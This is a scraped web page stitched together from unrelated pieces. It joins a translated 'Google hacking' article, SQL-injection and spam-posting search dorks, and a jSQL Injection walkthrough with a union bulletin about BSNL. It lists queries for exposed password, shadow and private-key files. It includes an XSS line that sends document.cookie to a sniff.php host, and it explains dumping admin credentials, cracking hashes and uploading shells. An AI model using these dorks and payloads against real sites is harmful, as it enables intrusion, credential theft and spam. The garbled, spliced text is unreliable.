Using little-known Google features to find the hidden. Using Little-Known Google Functions to Find Hidden Phrase Search Using Double Quotes

Hacking with Google

Alexander Antipov

The Google search engine (www.google.com) provides many search options. All these capabilities are an invaluable search tool for a first-time Internet user, and at the same time, an even more powerful weapon of invasion and destruction in the hands of people with evil intentions, including not only hackers, but also non-computer criminals and even terrorists.
(9475 views in 1 week)


Denis Batrankov
denisNOSPAMixi.ru

Attention:This article is not a guide to action. This article was written for you, administrators of WEB servers, so that you lose the false feeling that you are safe, and you finally understand the insidiousness of this method of obtaining information and set about protecting your site.

Introduction

For example, I found 1670 pages in 0.14 seconds!

2. Let's introduce another line, for example:

inurl: "auth_user_file.txt"

a little less, but this is already enough for free download and for brute-forcing (using the same John The Ripper). Below I will give some more examples.

So, you need to realize that the Google search engine has visited most of the sites on the Internet and cached the information they contain. This cached information allows you to get information about the site and the content of the site without a direct connection to the site, just digging into the information that is stored inside Google. Moreover, if the information on the site is no longer available, then the information in the cache may still be preserved. All it takes for this method is to know some Google keywords. This technique is called Google Hacking.

For the first time, information about Google Hacking appeared on the Bugtruck mailing list 3 years ago. In 2001, this topic was brought up by a French student. Here is a link to this letter http://www.cotse.com/mailing-lists/bugtraq/2001/Nov/0129.html. It provides the first examples of such queries:

1) Index of / admin
2) Index of / password
3) Index of / mail
4) Index of / + banques + filetype: xls (for france ...)
5) Index of / + passwd
6) Index of / password.txt

This topic made a splash in the English-reading part of the Internet quite recently: after Johnny Long's article published on May 7, 2004. For a more complete study of Google Hacking, I recommend visiting this author's site at http://johnny.ihackstuff.com. In this article, I just want to bring you up to date.

Who can use it:
- Journalists, spies and all those people who like to poke their noses into their own business can use this to search for compromising evidence.
- Hackers looking for suitable targets for hacking.

How Google works.

To continue the conversation, let me remind you of some of the keywords used in Google queries.

Search using the + sign

Google excludes words that are unimportant to Google. For example, question words, prepositions and articles in english language: for example are, of, where. In Russian, Google seems to consider all words important. If the word is excluded from the search, then Google writes about it. In order for Google to start searching for pages with these words in front of them, you need to add a + sign without a space before the word. For example:

ace + of base

Search using a sign -

If Google finds a large number of pages from which it is necessary to exclude pages with a specific topic, then you can force Google to search only for pages that do not have specific words. To do this, you need to indicate these words, putting before each sign - without a space before the word. For example:

fishing vodka

Search with ~

You may want to find not only the specified word, but also its synonyms. To do this, precede the word with the ~ symbol.

Finding the exact phrase using double quotes

Google searches on each page for all occurrences of the words that you wrote in the query string, and it does not care about the relative position of words, the main thing is that all the specified words are on the page at the same time (this is the default action). To find the exact phrase, you need to put it in quotation marks. For example:

"bookend"

To have at least one of the specified words, you need to specify the logical operation explicitly: OR. For example:

book safety OR protection

In addition, in the search bar, you can use the * sign to denote any word and. to denote any character.

Finding words using additional operators

There are search operators that are specified in the search string in the format:

operator: search_term

Spaces next to the colon are not needed. If you insert a space after the colon, you will see an error message, and before it, then Google will use them as a normal search string.
There are groups of additional search operators: languages \u200b\u200b- indicate in what language you want to see the result, date - limit results for the past three, six or 12 months, occurrences - indicate where in the document you need to search for a string: everywhere, in the title, in the URL, domains - search the specified site or, on the contrary, exclude it from the search, safe search - block sites containing the specified type of information and remove them from the search results pages.
However, some operators do not need an additional parameter, for example, the query " cache: www.google.com"can be called as a full-fledged search string, and some keywords, on the contrary, require a search word, for example" site: www.google.com help". In light of our topic, let's look at the following operators:

Operator

Description

Requires an additional parameter?

search only on the site specified in search_term

search only in documents with the search_term type

find pages containing search_term in title

find pages containing all the words search_term in the title

find pages containing the word search_term in their url

find pages containing all the words search_term in their url

Operator site: restricts the search only to the specified site, and you can specify not only the domain name, but also the IP address. For example, enter:

Operator filetype: restricts searches to files of a specific type. For example:

As of the article's release date, Google can search within 13 different file formats:

  • Adobe Portable Document Format (pdf)
  • Adobe PostScript (ps)
  • Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
  • Lotus WordPro (lwp)
  • MacWrite (mw)
  • Microsoft Excel (xls)
  • Microsoft PowerPoint (ppt)
  • Microsoft Word (doc)
  • Microsoft Works (wks, wps, wdb)
  • Microsoft Write (wri)
  • Rich Text Format (rtf)
  • Shockwave Flash (swf)
  • Text (ans, txt)

Operator link: shows all pages that point to the specified page.
It's probably always interesting to see how many places on the Internet know about you. Trying:

Operator cache: shows the version of the site in Google's cache as it looked when Google last visited this page. We take any site that changes frequently and look:

Operator intitle: searches for the specified word in the page title. Operator allintitle: is an extension - it looks for all specified multiple words in the page title. Compare:

intitle: flight to mars
intitle: flight intitle: to intitle: mars
allintitle: flight to mars

Operator inurl:makes Google show all pages containing the specified string in the URL. Operator allinurl: Searches for all words in a URL. For example:

allinurl: acid acid_stat_alerts.php

This command is especially useful for those who do not have SNORT - at least they can see how it works on a real system.

Hacking methods with Google

So, we found out that, using a combination of the above operators and keywords, anyone can collect the necessary information and search for vulnerabilities. These techniques are often referred to as Google Hacking.

Site Map

You can use the site: operator to see all the links Google finds on the site. Usually, pages that are dynamically created by scripts are not indexed using parameters, so some sites use ISAPI filters so that links are not in the form /article.asp?num\u003d10&dst\u003d5, and with slashes / article / abc / num / 10 / dst / 5... This is done so that the site is generally indexed by search engines.

Let's try:

site: www.whitehouse.gov whitehouse

Google thinks that every page on the site contains the word whitehouse. This is what we use to get all the pages.
There is also a simplified version:

site: whitehouse.gov

And the best part is that the comrades from whitehouse.gov did not even know that we looked at the structure of their site and even looked into the cached pages that Google downloaded for itself. This can be used to study the structure of sites and view the content, remaining unnoticed for the time being.

Viewing a list of files in directories

WEB servers can display lists of server directories instead of regular HTML pages. This is usually done to get users to select and download specific files. However, in many cases, it is not for administrators to show the contents of a directory. This occurs due to incorrect server configuration or lack of home page in the directory. As a result, the hacker has a chance to find something interesting in the directory and use it for his own purposes. To find all such pages, just notice that they all contain the words: index of in their title. But since the words index of contain not only such pages, we need to clarify the query and take into account the keywords on the page itself, so queries of the form are suitable for us:

intitle: index.of parent directory
intitle: index.of name size

Since most of the directory listings are intentional, you may find it difficult to find erroneously displayed listings the first time. But at least you can already use the listings to determine the version of the WEB server, as described below.

Getting the version of the WEB server.

Knowing the version of the WEB server is always useful before starting any hacker attack. Again, thanks to Google, you can get this information without connecting to a server. If you look closely at the listing of the directory, you can see that the name of the WEB server and its version are displayed there.

Apache1.3.29 - ProXad Server at trf296.free.fr Port 80

An experienced administrator can change this information, but, as a rule, it is true. Thus, to get this information, it is enough to send a request:

intitle: index.of server.at

To get information for a specific server, we clarify the request:

intitle: index.of server.at site: ibm.com

Or vice versa, we are looking for servers running on a specific server version:

intitle: index.of Apache / 2.0.40 Server at

This technique can be used by a hacker to find a victim. If, for example, he has an exploit for a certain version of the WEB server, he can find it and try the existing exploit.

You can also get the server version by looking at the pages that are installed by default when installing a fresh version of the WEB server. For example, to see the Apache 1.2.6 test page, just type

intitle: Test.Page.for.Apache it.worked!

Moreover, some operating systems immediately install and run the WEB server during installation. However, some users are not even aware of this. Naturally, if you see that someone has not deleted the default page, then it is logical to assume that the computer has not been subjected to any configuration at all and is probably vulnerable to attacks.

Try to find IIS 5.0 pages

allintitle: Welcome to Windows 2000 Internet Services

In the case of IIS, you can determine not only the server version, but also the Windows version and Service Pack.

Another way to determine the version of the WEB server is to search for manuals (help pages) and examples that can be installed on the site by default. Hackers have found many ways to use these components to gain privileged access to a site. That is why you need to remove these components on the production site. Not to mention the fact that by the presence of these components you can get information about the type of server and its version. For example, find the apache manual:

inurl: manual apache directives modules

Using Google as a CGI scanner.

CGI scanner or WEB scanner is a utility for finding vulnerable scripts and programs on the victim's server. These utilities should know what to look for, for this they have a whole list of vulnerable files, for example:

/cgi-bin/cgiemail/uargg.txt
/random_banner/index.cgi
/random_banner/index.cgi
/cgi-bin/mailview.cgi
/cgi-bin/maillist.cgi
/cgi-bin/userreg.cgi

/iissamples/ISSamples/SQLQHit.asp
/SiteServer/admin/findvserver.asp
/scripts/cphost.dll
/cgi-bin/finger.cgi

We can find each of these files using Google, using the words index of or inurl in addition to the file name in the search bar: we can find sites with vulnerable scripts, for example:

allinurl: /random_banner/index.cgi

Using the additional knowledge, a hacker can exploit a script vulnerability and use this vulnerability to force the script to return any file stored on the server. For example a password file.

How to protect yourself from Google hacking.

1. Do not post important data to the WEB server.

Even if you posted the data temporarily, then you can forget about it, or someone will have time to find and pick up this data before you erase it. Don't do that. There are many other ways to transfer data to protect it from theft.

2. Check your site.

Use the methods described to research your site. Check your site periodically with new methods that appear on the site http://johnny.ihackstuff.com. Remember that if you want to automate your actions, you need to get special permission from Google. If you read carefully http://www.google.com/terms_of_service.html then you will see the phrase: You may not send automated queries of any sort to Google "s system without express permission in advance from Google.

3. You may not need Google to index your site or part of it.

Google allows you to remove a link to your site or part of it from its database, as well as remove pages from the cache. In addition, you can prohibit the search for images on your site, prohibit the display of short fragments of pages in search results. http://www.google.com/remove.html ... To do this, you must confirm that you are actually the owner of this site or insert tags into the page or

4. Use robots.txt

It is known that search engines look into the robots.txt file located at the root of the site and do not index those parts that are marked with the word Disallow... You can take advantage of this to prevent part of the site from being indexed. For example, to avoid indexing the entire site, create a robots.txt file containing two lines:

User-agent: *
Disallow: /

What else happens

So that life does not seem like honey to you, I will say in the end that there are sites that follow those people who, using the above methods, are looking for holes in scripts and WEB servers. An example of such a page is

Application.

A little bit sweet. Try something from the following list yourself:

1. #mysql dump filetype: sql - find dumps of mySQL databases
2. Host Vulnerability Summary Report - will show you what vulnerabilities other people have found
3.phpMyAdmin running on inurl: main.php - this will force close control via phpmyadmin panel
4.not for distribution confidential
5. Request Details Control Tree Server Variables
6. Running in Child mode
7. This report was generated by WebLog
8.intitle: index.of cgiirc.config
9.filetype: conf inurl: firewall -intitle: cvs - can anyone need firewall configuration files? :)
10. intitle: index.of finances.xls - hmm ....
11.intitle: Index of dbconvert.exe chats - icq chat logs
12.intext: Tobias Oetiker traffic analysis
13.intitle: Usage Statistics for Generated by Webalizer
14.intitle: statistics of advanced web statistics
15.intitle: index.of ws_ftp.ini - ws ftp config
16.inurl: ipsec.secrets holds shared secrets - the secret key is a good find
17.inurl: main.php Welcome to phpMyAdmin
18.inurl: server-info Apache Server Information
19.site: edu admin grades
20. ORA-00921: unexpected end of SQL command - getting paths
21. intitle: index.of trillian.ini
22. intitle: Index of pwd.db
23. intitle: index.of people.lst
24. intitle: index.of master.passwd
25. inurl: passlist.txt
26. intitle: Index of .mysql_history
27. intitle: index of intext: globals.inc
28. intitle: index.of administrators.pwd
29. intitle: Index.of etc shadow
30. intitle: index.of secring.pgp
31.inurl: config.php dbuname dbpass
32. inurl: perform filetype: ini

  • "Hacking mit Google"
  • Training center "Informzashita" http://www.itsecurity.ru - a leading specialized center in the field of information security training (License of the Moscow Education Committee No. 015470, State accreditation No. 004251). The only authorized training center for Internet Security Systems and Clearswift in Russia and the CIS countries. Microsoft Authorized Training Center (Security specialization). The training programs are coordinated with the State Technical Commission of Russia, the FSB (FAPSI). Certificates of training and state documents on professional development.

    SoftKey is a unique service for buyers, developers, dealers and affiliate partners. In addition, this is one of the best online software stores in Russia, Ukraine, Kazakhstan, which offers customers a wide assortment, many payment methods, prompt (often instant) order processing, tracking the order execution process in the personal section, various discounts from the store and manufacturers BY.

    I decided to talk a little about information security. The article will be useful for novice programmers and those who have just started doing Frontend development. What is the problem?

    Many novice developers are so addicted to writing code that they completely forget about the safety of their work. And most importantly, they forget about vulnerabilities such as SQL query, XXS. They also come up with light passwords for their admin panels and are subjected to brute force. What are these attacks and how can they be avoided?

    SQL injection

    SQL injection is the most common type of database attack that is carried out with an SQL query for a specific DBMS. Many people and even large companies suffer from such attacks. The reason is a developer's mistake when writing a database and, in fact, SQL queries.

    A SQL injection attack is possible due to incorrect processing of input data used in SQL queries. If a hacker successfully completes an attack, you risk losing not only the contents of the databases, but, accordingly, the passwords and logs of the administrative panel. And this data will be quite enough to completely take over the site or make irreversible adjustments to it.

    The attack can be successfully reproduced in scripts written in PHP, ASP, Perl, and other languages. The success of such attacks depends more on what DBMS is used and how the script itself is implemented. There are a lot of vulnerable SQL injection sites in the world. This is easy to verify. It is enough to enter "dorks" - these are special requests for finding vulnerable sites. Here are some of them:

    • inurl: index.php? id \u003d
    • inurl: trainers.php? id \u003d
    • inurl: buy.php? category \u003d
    • inurl: article.php? ID \u003d
    • inurl: play_old.php? id \u003d
    • inurl: declaration_more.php? decl_id \u003d
    • inurl: pageid \u003d
    • inurl: games.php? id \u003d
    • inurl: page.php? file \u003d
    • inurl: newsDetail.php? id \u003d
    • inurl: gallery.php? id \u003d
    • inurl: article.php? id \u003d

    How to use them? It is enough to enter them into a Google or Yandex search engine. The search engine will give you not only a vulnerable site, but also a page for this vulnerability. But we will not dwell on this and make sure that the page is indeed vulnerable. To do this, it is enough to put a single quotation mark "‘ "after the value" id \u003d 1 ". Something like this:

    • inurl: games.php? id \u003d 1 '

    And the site will give us an error about the SQL query. What does our hacker need next?

    And then he needs this very link to the error page. Then, in most cases, the work on the vulnerability takes place in the Kali linux distribution with its utilities for this part: injecting the injection code and performing the necessary operations. How this will happen, I cannot tell you. But you can find information about this on the Internet.

    XSS Attack

    This type of attack is carried out on cookies. Users, in turn, are very fond of saving them. Why not? How without them? Indeed, thanks to Cookies, we do not drive a password from Vk.com or Mail.ru a hundred times. And few of those who refuse them. But on the Internet for hackers there is often a rule: the convenience factor is directly proportional to the insecurity factor.

    To implement an XSS attack, our hacker needs knowledge of JavaScript. At first glance, the language is very simple and harmless because it does not have access to computer resources. A hacker can work with JavaScript only in a browser, but that's enough. After all, the main thing is to enter the code into the web page.

    I will not talk in detail about the attack process. I'll just tell you the basics and the meaning of how this happens.

    A hacker can add JS code to a forum or guestbook:

    The scripts will redirect us to the infected page, where the code will be executed: whether it be a sniffer, some kind of storage or an exploit that will somehow steal our Cookies from the cache.

    Why JavaScript? Because JavaScript gets along well with web requests and has access to cookies. But if our script transfers us to some site, then the user will easily notice it. Here, the hacker uses a more cunning option - he simply writes the code into the picture.

    Img \u003d new Image ();

    Img.src \u003d ”http://192.168.1.7/sniff.php?32+document.cookie;

    We just create an image and assign our script as an address.

    How to protect yourself from all this? Very simple - don't click on suspicious links.

    DoS and DDos Attacks


    DoS (from the English Denial of Service - denial of service) - a hacker attack on a computer system with the aim of bringing it to failure. This is the creation of such conditions under which conscientious users of the system cannot gain access to the provided system resources (servers), or this access is difficult. The failure of the system can be a step towards its capture, if in an emergency situation the software gives out any critical information: for example, the version, part of the program code, etc. But most often it is a measure of economic pressure: the loss of a simple service that generates income. Bills from the provider or measures to avoid an attack significantly hit the "target" in the pocket. Currently, DoS and DDoS attacks are the most popular, as they allow almost any system to fail without leaving any legal evidence.

    What is the difference between DoS and DDos attacks?

    DoS is a cleverly constructed attack. For example, if the server does not check the correctness of incoming packets, then a hacker can make such a request, which will be processed forever, and there will not be enough CPU time to work with other connections. Accordingly, customers will receive a denial of service. But it will not work to overload or disable large well-known sites in this way. They are armed with fairly wide channels and super-powerful servers that can cope with such an overload without any problems.

    DDoS is actually the same attack as DoS. But if there is one request packet in DoS, then in DDoS there can be hundreds or more of them. Even super-powerful servers may not be able to handle this overload. Let me give you an example.

    DoS attack is when you are having a conversation with someone, but then some ill-mannered person comes up and starts shouting loudly. At the same time, it is either impossible or very difficult to talk. Solution: call security, which will calm and lead the person out of the room. DDoS attacks are when such ill-mannered people are rushed in by a crowd of thousands. In this case, the guards will not be able to twist and take everyone away.

    DoS and DDoS are produced from computers called zombies. These are computers of users hacked by hackers, who do not even suspect that their machine is involved in an attack on a server.

    How to protect yourself from this? In general, nothing. But it is possible to complicate the task for a hacker. To do this, you need to choose a good hosting with powerful servers.

    Bruteforce attack

    A developer can come up with a lot of protection systems against attacks, completely view the scripts we have written, check the site for vulnerabilities, etc. But when it comes to the last step of the site layout, namely when it will be easy to put a password on the admin panel, he may forget about one thing. Password!

    It is strongly not recommended to set a simple password. It can be 12345, 1114457, vasya111, etc. It is not recommended to set passwords less than 10-11 characters long. Otherwise, you may undergo the most common and not difficult attack - Brute force.

    Brute force is a dictionary-based password brute-force attack using special programs. Dictionaries can be different: Latin, enumeration by numbers, say up to a certain range, mixed (Latin + numbers), and even there are dictionaries with unique symbols @ # 4 $% & * ~~ `’ ”\\? etc.

    Of course, this kind of attack can be easily avoided by creating a complex password. Even captcha can save you. And also, if your site is made on a CMS, then many of them calculate this type of attack and block ip. You must always remember that the more different characters there are in the password, the harder it is to find it.

    How do Hackers work? In most cases, they either suspect or know part of the password beforehand. It is quite logical to assume that the user's password will certainly not consist of 3 or 5 characters. These passwords lead to frequent hacks. Basically, hackers take a range from 5 to 10 characters and add a few characters there, which they probably know in advance. Next, passwords are generated with the required ranges. The Kali linux distribution even contains programs for such cases. And voila, the attack will not last long anymore, since the volume of the dictionary is not so large anymore. In addition, a hacker can use the power of the video card. Some of them support the CUDA system, while the search speed increases as much as 10 times. And now we see that an attack in such a simple way is quite real. But not only websites are subject to brute force.

    Dear developers, never forget about the information security system, because today many people, including states, suffer from such types of attacks. After all, the biggest vulnerability is a person who can always be distracted somewhere or not overlook somewhere. We are programmers, but not programmed machines. Be always on the lookout, because the loss of information threatens with serious consequences!

    How to search correctly with google.com

    Everyone probably knows how to use a search engine like Google \u003d) But not everyone knows that if you correctly compose search query with the help of special constructions, you can achieve the results that you are looking for much more efficiently and faster \u003d) In this article I will try to show what and how you need to do in order to search correctly

    Google supports several advanced search operators that have special meaning when searching on google.com. Typically, these operators modify the search, or even tell Google to do completely different types of searches. For example, the construction link: is a special operator, and the request link: www.google.com will not give you a normal search, but will instead find all web pages that have links to google.com.
    alternative request types

    cache: If you include other words in your query, Google will highlight those included words within the cached document.
    For example, cache: www.web site will show the cached content with the word "web" highlighted.

    link: the search query discussed above will show web pages that contain links to the specified query.
    For example: link: www.site will display all pages that have a link to http: //www.site

    related: Displays web pages that are "related" to the specified web page.
    For example, related: www.google.com will list web pages that are similar to Google's home page.

    info: Request Information: Provides some of the information Google has about the requested web page.
    For example, info: website will show information about our forum \u003d) (Armada - Forum of adult webmasters).

    Other information requests

    define: The define: query will provide a definition of the words you enter after this, compiled from various online sources. The definition will be for the entire phrase entered (that is, it will include all words in the exact query).

    stocks: If you start your request with stocks: Google will treat the rest of the request terms as stock ticker symbols, and link to a page showing the ready information for those symbols.
    For example, stocks: Intel yahoo will show information about Intel and Yahoo. (Note that you must type the latest news symbols, not the company name)

    Request Modifiers

    site: If you include site: in your query, Google will limit the results to the websites it finds on the given domain.
    You can also search for individual zones, as such ru, org, com, etc ( site: com site: ru)

    allintitle: If you run a request with allintitle:, Google will limit the results with all the words of the request in the header.
    For example, allintitle: google search will return all google search pages like images, Blog, etc

    intitle: If you include intitle: in your request, Google will limit the results to documents containing that word in the title.
    For example, intitle: Business

    allinurl: If you run a query with allinurl: Google will limit the results, with all the query words in the URL.
    For example, allinurl: google search will return documents with google and search in the header. Also, as an option, you can separate words with a slash (/) then words on both sides of the slash will be searched within the same page: Example allinurl: foo / bar

    inurl: If you include inurl: in your query, Google will limit the results to documents containing that word in the URL.
    For example, Animation inurl: website

    intext: searches only in the text of the page for the specified word, ignoring the title and text of links, and other things not related to. There is also a derivative of this modifier - allintext: those. further, all words in the query will be searched only in the text, which is also important, ignoring frequently used words in links
    For example, intext: forum

    daterange: searches in time frames (daterange: 2452389-2452389), dates for times are specified in Julian format.

    Well, all sorts of other interesting examples requests

    Examples of writing queries for Google. For spammers

    Inurl: control.guest? A \u003d sign

    Site: books.dreambook.com “Homepage URL” “Sign my” inurl: sign

    Site: www.freegb.net Homepage

    Inurl: sign.asp “Character Count”

    "Message:" inurl: sign.cfm "Sender:"

    Inurl: register.php “User Registration” “Website”

    Inurl: edu / guestbook “Sign the Guestbook”

    Inurl: post “Post Comment” “URL”

    Inurl: / archives / “Comments:” “Remember info?”

    “Script and Guestbook Created by:” “URL:” “Comments:”

    Inurl:? Action \u003d add “phpBook” “URL”

    Intitle: ”Submit New Story”

    Magazines

    Inurl: www.livejournal.com/users/ mode \u003d reply

    Inurl greatestjournal.com/ mode \u003d reply

    Inurl: fastbb.ru/re.pl?

    Inurl: fastbb.ru /re.pl? "Guest book"

    Blogs

    Inurl: blogger.com/comment.g? ”PostID” "anonymous"

    Inurl: typepad.com/ “Post a comment” “Remember personal info?”

    Inurl: greatestjournal.com/community/ “Post comment” “addresses of anonymous posters”

    “Post comment” “addresses of anonymous posters” -

    Intitle: "Post comment"

    Inurl: pirillo.com “Post comment”

    Forums

    Inurl: gate.html? ”Name \u003d Forums” “mode \u003d reply”

    Inurl: "forum / posting.php? Mode \u003d reply"

    Inurl: "mes.php?"

    Inurl: ”members.html”

    Inurl: forum / memberlist.php? ”

    Run the downloaded file by double clicking (you need to have a virtual machine).

    3. Anonymity when checking the site for SQL injection

    Configuring Tor and Privoxy on Kali Linux

    [Section under construction]

    Configuring Tor and Privoxy on Windows

    [Section under construction]

    Proxy settings in jSQL Injection

    [Section under construction]

    4. Checking the site for SQL injection with jSQL Injection

    Working with the program is extremely simple. It is enough to enter the site address and press ENTER.

    The next screenshot shows that the site is vulnerable to three types of SQL injection at once (information about them is indicated in the lower right corner). By clicking on the names of the injections, you can switch the method used:

    Also, the existing databases have already been displayed.

    You can see the contents of each table:

    Usually, the most interesting things in the tables are the administrator credentials.

    If you are lucky and you find the administrator's data, then it's too early to rejoice. You also need to find the admin panel where to enter this data.

    5. Search for admin areas with jSQL Injection

    To do this, go to the next tab. Here we are greeted by a list of possible addresses. You can select one or several pages to check:

    The convenience lies in the fact that you do not need to use other programs.

    Unfortunately, there are not very many careless programmers who store passwords in clear text. Quite often in the password line we see something like

    8743b52063cd84097a65d1633f5c74f5

    This is a hash. You can decrypt it with brute force. And ... jSQL Injection has a built-in brute-force.

    6. Brute-forcing hashes using jSQL Injection

    The undoubted convenience is that you do not need to look for other programs. It supports many of the most popular hashes.

    This is not the best option. In order to become a guru in decoding hashes, the Book "" in Russian is recommended.

    But, of course, when there is no other program at hand or there is no time to learn, jSQL Injection with the built-in brute-force function will come in handy.

    There are settings: you can set what characters are included in the password, the password length range.

    7. Operations with files after detecting SQL injection

    In addition to operations with databases - reading and modifying them, in case of SQL injection detection, the following file operations can be performed:

    • reading files on the server
    • uploading new files to the server
    • uploading shells to the server

    And all this is implemented in jSQL Injection!

    There are restrictions - the SQL server must have file privileges. Reasonable system administrators they are disabled and you cannot access the file system.

    The existence of file privileges is easy enough to check. Go to one of the tabs (reading files, creating a shell, uploading a new file) and try to perform one of the specified operations.

    Another very important note - we need to know the exact absolute path to the file with which we will work - otherwise nothing will work.

    Take a look at the following screenshot:

    Any attempt to operate on a file is answered by: No FILE privilege (no file privileges). And nothing can be done about it.

    If instead you have a different error:

    Problem writing into [directory_name]

    This means that you have incorrectly specified the absolute path where you want to write the file.

    In order to assume an absolute path, you must at least know the operating system on which the server is running. To do this, switch to the Network tab.

    Such an entry (line Win64) gives us reason to assume that we are dealing with a Windows OS:

    Keep-Alive: timeout \u003d 5, max \u003d 99 Server: Apache / 2.4.17 (Win64) PHP / 7.0.0RC6 Connection: Keep-Alive Method: HTTP / 1.1 200 OK Content-Length: 353 Date: Fri, 11 Dec 2015 11:48:31 GMT X-Powered-By: PHP / 7.0.0RC6 Content-Type: text / html; charset \u003d UTF-8

    Here we have some Unix (* BSD, Linux):

    Transfer-Encoding: chunked Date: Fri, 11 Dec 2015 11:57:02 GMT Method: HTTP / 1.1 200 OK Keep-Alive: timeout \u003d 3, max \u003d 100 Connection: keep-alive Content-Type: text / html X- Powered-By: PHP / 5.3.29 Server: Apache / 2.2.31 (Unix)

    And here we have CentOS:

    Method: HTTP / 1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID \u003d 9p60gtunrv7g41iurr814h9rd0; path \u003d / Connection: keep-alive X-Cache-Lookup: MISS from t1.hoster.ru:6666 Server: Apache / 2.2.15 (CentOS) X-Powered-By: PHP / 5.4.37 X-Cache: MISS from t1.hoster.ru Cache-Control: no-store, no-cache, must-revalidate, post-check \u003d 0, pre-check \u003d 0 Pragma: no-cache Date: Fri, 11 Dec 2015 12:08:54 GMT Transfer-Encoding: chunked Content-Type: text / html; charset \u003d WINDOWS-1251

    On Windows, a typical site folder is ... But, in fact, if someone "thought of" making a server on Windows, then, very likely, this person has not heard anything about privileges. Therefore, it is worth starting attempts directly from the C: / Windows / directory:

    As you can see, everything went fine the first time.

    But the jSQL Injection shells themselves raise my doubts. If you have file privileges, then you can easily upload something from the web interface.

    8. Bulk check of sites for SQL injection

    And even jSQL Injection has this feature. Everything is extremely simple - download a list of sites (you can import from a file), select those you want to check and press the appropriate button to start the operation.

    Conclusion on jSQL Injection

    jSQL Injection is a good, powerful tool for finding and then using the SQL Injection found on sites. Its undoubted advantages: ease of use, built-in related functions. jSQL Injection can be a beginner's best friend when analyzing websites.

    Of the shortcomings, I would note the impossibility of editing databases (at least I did not find this functionality). As with all tools with a graphical interface, the disadvantages of this program can be attributed to the impossibility of using it in scripts. Nevertheless, some automation is possible in this program too - thanks to the built-in function mass verification sites.

    JSQL Injection is much more convenient to use than sqlmap. But sqlmap supports more types of SQL injection, has options for working with file firewalls and some other functions.

    Bottom line: jSQL Injection is a novice hacker's best friend.

    You can find help on this program in the Kali Linux Encyclopedia on this page: http://kali.tools/?p\u003d706

    Messages updated during the month of Jan 2020

    16-01-2020

    Condolence Message

    SNEA Expresses Deep Sorrow for the Demise of

    Veteran Leader

    Com K.Viswanathan

    CHQ Treasurer of JETA / JTOA (3 Times)

    19/11, D block Nandhini flats church road, Chrompet Chennai 44,


    15-01-2020

    15-01-2020

    15-01-2020

    A Vital Breakthrough for Triple Play FTTH service through BSNL:

    Open policy for provision of IPTV: The much awaited Policy for Provision of IPTV services through BSNL FTTH by content providers / partners have been issued by BSNL CO.

    This venture is touted as BSNLs answer to major Private Players providing Triple Play Services--

    By this project, BSNL is going to provide Real Triple Play Service to customers because here Watching TV is not going to consume Internet Data.

    This is going to be one major Lifeline for BSNL revival.

    This Venture has already been successfully developed and implemented privately by an LCO / TIP in Thrissur BA in Kerala Circle with the technical support of BSNL in house talents led by Com Anoop K J, JTO OMCR, Ernakulam.

    They have devised an App to make / receive landphone calls using mobile phone using WiFi.

    This project was presented in the recently held CWC Meet of SNEA at Bangalore in Augusts, 2019.

    Various Proposals have been received from different Circles for the implementation of IPTV through BSNL Network.

    The absence of IPTV (or TV service) has been identified as one of the major reasons for the lackluster response to BSNL FTTH connections from multi operator LCOs across the country.

    SNEA have been pursuing the project in all levels and we are happy to see light at the end of the tunnel.

    We congratulate in the in-house talents in BSNL who showcased their real potential.

    SNEA thank all officers who have been working for the implementation of the project in BSNL CO and all Circle Offices and particularly Com. P Padmanabha Rao, our AGS & DGM, BSNL CO.

    IPTV Open Policy

    15-01-2020

    Organizational Restructuring: Merger of Non-Territorial Circles.

    Maintenance and Project Circles merged and renamed as Core Network-Transmission (East / West / North / South). Separate Circle for North East namely Core Network-Transmission NE Region covering AS, NE I and NE II Circles. Effective from 04/01/2020.

    Telecom Factories merged with respective Territorial Circles as BA head w.e.f 02/01/2020.

    NCNGN Circle merged with BBNW Circle.

    Nodal Center Chandigarh merged with Punjab Circle.

    Only one Training Circle with HQ at ALTTC, Gaziabad. ALTTC, NATFM and BRBRAITT will function as BA Heads. Only zonal RTTCs in future.

    Covering letter Annexure

    15-01-2020


    14-01-2020

    GS writes to Shri P K Purwar, CMD / BSNL:

    Kindly take immediate action for Regular promotion instead of Look after arrangement in different Grades from among the Executives already working in higher scales by mere designation change to fill up the huge vacuum created in the field units by VRS 2019 and for motivating the Executives to take extra work load:

    As per the data available, on 02/01/2020,

    i) Only 57 DGM (T) will be available against the sanctioned strength of 1481.

    ii) Only 32 DGM (Fin) will be available against the sanctioned strength of 402.

    iii) Only 1746 AGM (T) will be available in BSNL instead of 6500 AGMs working one year back. On DGM promotion, the number of AGMs will be about 1200, less than 20%. SDEs with 15 years of service are waiting for promotion.

    iv) Only 70 CAOs will be available against the sanctioned strength of 1347. They will not be sufficient even to man the vacant DGM (Fin) posts.

    v) Thousands of Executives in higher scales are working in JTO, SDE equivalent grades for 5 to 30 years and waiting for the promotion. JTOs recruited from 1988 are waiting for promotion in Arch wing. Thousands of JTOs from 1999, 2001 to 2008, 2010, 2013 etc batches are waiting for their first promotion. JTO (Civil / Elect / TF) wing status is equally bad.

    We totally object to the prevalent look after arrangement being followed by the management instead of regular promotion. The Executives are already working in higher scales and they may be promoted to higher grades on regular basis just by designation change, instead of LA arrangement.

    GS letter to CMD

    11-01-2020

    Meeting with Shri Arvind Vadnerkar, DIR (HR) on 09.01.2020: GS, President and both AGSs met DIR (HR) in the presence of Sr GM (Pers & Estt), GM (SR), GM (Restg), GM (Admn) and GMs (Pers) and held discussions on the following issues:

    Staffing norms and Restructuring of BSNL: We explained the temporary staffing norm issued by Restg cell is not at all workable as the field realities are not considered by the management. By the temp norms, some SSAs headed by GMs today has to be headed by an SDE in the future. There will be large number of small SSAs with huge geographical areas where only one or two Executives will be justified. Practically it will be impossible to maintain the services in those areas. By outsourcing, the role and responsibility of Executives will not come down especially in CFA segment. In Rural areas, clubbing all the works of Transmission, BTS mtce, EB, Cable maintenance with SDE (Group) with vast areas will defeat the very purpose. Similarly urban areas norms also stringent. So the temporary norms are to be reworked immediately. Otherwise nobody will come forward to work in the external plant and Trans mtce and those who are working also will request for posting in Indoor, mobile etc. Similarly substitutes are not marked in many SSAs for a smooth takeover on 01/31/2020. Director and GM (Restg) explained that it is only temporary norms which can be reviewed. We requested to review immediately.

